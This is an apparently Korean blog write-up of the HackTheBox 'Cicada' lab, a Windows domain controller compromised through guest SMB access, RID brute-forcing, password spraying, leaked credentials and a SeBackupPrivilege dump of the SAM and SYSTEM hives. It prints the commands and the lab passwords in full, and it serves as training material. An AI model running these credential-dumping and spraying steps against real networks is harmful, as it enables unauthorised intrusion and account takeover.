cicada

nmap

┌──(root㉿BOOK-2S4VUSLFM3)-[/home/surtesters]
└─# nmap -sS -p- --min-rate=10000 10.129.231.149
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-09 00:02 KST
Nmap scan report for cicada.htb (10.129.231.149)
Host is up (0.26s latency).
Not shown: 65524 filtered tcp ports (no-response)
PORT     STATE SERVICE
53/tcp   open  domain
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
636/tcp  open  ldapssl
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl
5985/tcp open  wsman

Nmap done: 1 IP address (1 host up) scanned in 14.12 seconds

┌──(root㉿BOOK-2S4VUSLFM3)-[/home/surtesters]
└─# nmap -sC -p 53,88,135,139,389,445,464,636,3268,3269,5985 --min-rate=10000 10.129.231.149
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-09 00:03 KST
Nmap scan report for cicada.htb (10.129.231.149)
Host is up (0.26s latency).

PORT     STATE SERVICE
53/tcp   open  domain
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
636/tcp  open  ldapssl
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
5985/tcp open  wsman

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
|_clock-skew: 6h59m59s
| smb2-time:
|   date: 2025-04-08T22:03:31
|_  start_date: N/A

Nmap done: 1 IP address (1 host up) scanned in 41.38 seconds

88 (kerberos) 오픈, 389(ldap db) 오픈 DC 이다.

evil-winrm (5985) 사용가능

domain => cicada.htb 호스트 등록 먼저 수행

smb 서비스가 열려 있으므로, 공유되어 있는 리스트 조회 시도

smbclient -N -L //cicada.htb

DEV 와 HR 열려있었으며, 각각 접속 시도 후 HR 에 접속 및 파일 다운로드 후 오픈

알고 있는 것은 비밀번호 뿐이니, RID 브르투포싱을 통해 username 획득을 시도

netexec smb cicada.htb -u zz -p "" --rid-brute

guest 모드로 rid-brute 포스 가능!

┌──(root㉿BOOK-2S4VUSLFM3)-[/home/surtesters]
└─# netexec smb cicada.htb -u zz -p "" --rid-brute
SMB         10.129.231.149  445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.129.231.149  445    CICADA-DC        [+] cicada.htb\zz: (Guest)
SMB         10.129.231.149  445    CICADA-DC        498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.129.231.149  445    CICADA-DC        500: CICADA\Administrator (SidTypeUser)
SMB         10.129.231.149  445    CICADA-DC        501: CICADA\Guest (SidTypeUser)
SMB         10.129.231.149  445    CICADA-DC        502: CICADA\krbtgt (SidTypeUser)
SMB         10.129.231.149  445    CICADA-DC        512: CICADA\Domain Admins (SidTypeGroup)
SMB         10.129.231.149  445    CICADA-DC        513: CICADA\Domain Users (SidTypeGroup)
SMB         10.129.231.149  445    CICADA-DC        514: CICADA\Domain Guests (SidTypeGroup)
SMB         10.129.231.149  445    CICADA-DC        515: CICADA\Domain Computers (SidTypeGroup)
SMB         10.129.231.149  445    CICADA-DC        516: CICADA\Domain Controllers (SidTypeGroup)
SMB         10.129.231.149  445    CICADA-DC        517: CICADA\Cert Publishers (SidTypeAlias)
SMB         10.129.231.149  445    CICADA-DC        518: CICADA\Schema Admins (SidTypeGroup)
SMB         10.129.231.149  445    CICADA-DC        519: CICADA\Enterprise Admins (SidTypeGroup)
SMB         10.129.231.149  445    CICADA-DC        520: CICADA\Group Policy Creator Owners (SidTypeGroup)
SMB         10.129.231.149  445    CICADA-DC        521: CICADA\Read-only Domain Controllers (SidTypeGroup)
SMB         10.129.231.149  445    CICADA-DC        522: CICADA\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.129.231.149  445    CICADA-DC        525: CICADA\Protected Users (SidTypeGroup)
SMB         10.129.231.149  445    CICADA-DC        526: CICADA\Key Admins (SidTypeGroup)
SMB         10.129.231.149  445    CICADA-DC        527: CICADA\Enterprise Key Admins (SidTypeGroup)
SMB         10.129.231.149  445    CICADA-DC        553: CICADA\RAS and IAS Servers (SidTypeAlias)
SMB         10.129.231.149  445    CICADA-DC        571: CICADA\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.129.231.149  445    CICADA-DC        572: CICADA\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.129.231.149  445    CICADA-DC        1000: CICADA\CICADA-DC$ (SidTypeUser)
SMB         10.129.231.149  445    CICADA-DC        1101: CICADA\DnsAdmins (SidTypeAlias)
SMB         10.129.231.149  445    CICADA-DC        1102: CICADA\DnsUpdateProxy (SidTypeGroup)
SMB         10.129.231.149  445    CICADA-DC        1103: CICADA\Groups (SidTypeGroup)
SMB         10.129.231.149  445    CICADA-DC        1104: CICADA\john.smoulder (SidTypeUser)
SMB         10.129.231.149  445    CICADA-DC        1105: CICADA\sarah.dantelia (SidTypeUser)
SMB         10.129.231.149  445    CICADA-DC        1106: CICADA\michael.wrightson (SidTypeUser)
SMB         10.129.231.149  445    CICADA-DC        1108: CICADA\david.orelious (SidTypeUser)
SMB         10.129.231.149  445    CICADA-DC        1109: CICADA\Dev Support (SidTypeGroup)
SMB         10.129.231.149  445    CICADA-DC        1601: CICADA\emily.oscars (SidTypeUser)

유저명들에 대해 패스워드 스프레잉 수행

nxc smb cicada.htb -u users -p 'Cicada$M6Corpb*@Lp#nZp!8'

michael.wrightson 이 여전히 해당 비번 사용 중

해당 username, password 로 원격 접속 수행

wmiexec.py CICADA/michael.wrightson:'Cicada$M6Corpb*@Lp#nZp!8'@10.129.231.149
evil-winrm -i cicada.htb -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8'

둘다 실패

nxc smb cicada.htb -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' --shares

확인 시 DEV 에 대한 read 권한 없음

다른 users 찾아보기

nxc smb cicada.htb -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' --users

description 내 david.orelious 의 비번 확인 가능

nxc smb cicada.htb -u 'david.orelious' -p 'aRt$Lp#7t*VQ!3' --shares

DEV 접근 및 ps 스크립트 다운로드 완료

그 전에 접속 시도

wmiexec.py CICADA/david.orelious:'aRt$Lp#7t*VQ!3'@10.129.231.149
evil-winrm -i cicada.htb -u 'david.orelious' -p 'aRt$Lp#7t*VQ!3'

둘다 원격접속 안됨

해당 스크립트에는 credential 타 유저의 credential 정보가 가능하며,

smb 접속 및 원격 접속 모두 시도

nxc smb cicada.htb -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt' --shares

C 리드 권한 존재

smbclient로 접속하여 flag 획득

winrm 접속시도

evil-winrm -i cicada.htb -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'

권한 이름설명상태의미 및 활용 가능성

SeBackupPrivilege	파일 및 디렉토리 백업 권한	Enabled	NTFS 권한 무시하고 파일 읽기 가능 → SYSTEM 파일, SAM 등 접근 가능
SeRestorePrivilege	파일 및 디렉토리 복원 권한	Enabled	NTFS 무시하고 파일 덮어쓰기 가능 → 백도어 삽입 등
SeShutdownPrivilege	시스템 종료 권한	Enabled	시스템 재시작, 종료 가능 (DoS 목적)
SeChangeNotifyPrivilege	디렉토리 트래버스(Traverse) 권한	Enabled	거의 모든 사용자에 있음. 트래버스 가능
SeIncreaseWorkingSetPrivilege	프로세스 워킹셋 증가 권한	Enabled	메모리 접근/할당 권한 증가. 주로 성능 최적화용

- SeBackupPrivilege 권한 : SAM, SYSTEM 하이브 덤프 및 NTDS.dit 덤프 가능

 reg save hklm\sam c:\tempfor\sam
 reg save hklm\system C:\tempfor\system

SAM, SYSTEM 하이브 다운로드 하여, 해시 추출 시도

관리자 hash 획득

evil-winrm 으로 로그인 성공

'Hacking > HackTheBox' 카테고리의 다른 글

EscapeTwo (0)	2025.04.23
Sniper (0)	2025.03.27
Administrator (1)	2024.11.26
Certified (Windows · Medium) (0)	2024.11.11
aragog (Linux) (1)	2024.11.04

SurTesterS

cicada

nmap

'Hacking > HackTheBox' 카테고리의 다른 글

티스토리툴바

cicada

nmap

'Hacking > HackTheBox' 카테고리의 다른 글

'Hacking/HackTheBox' Related Articles

티스토리툴바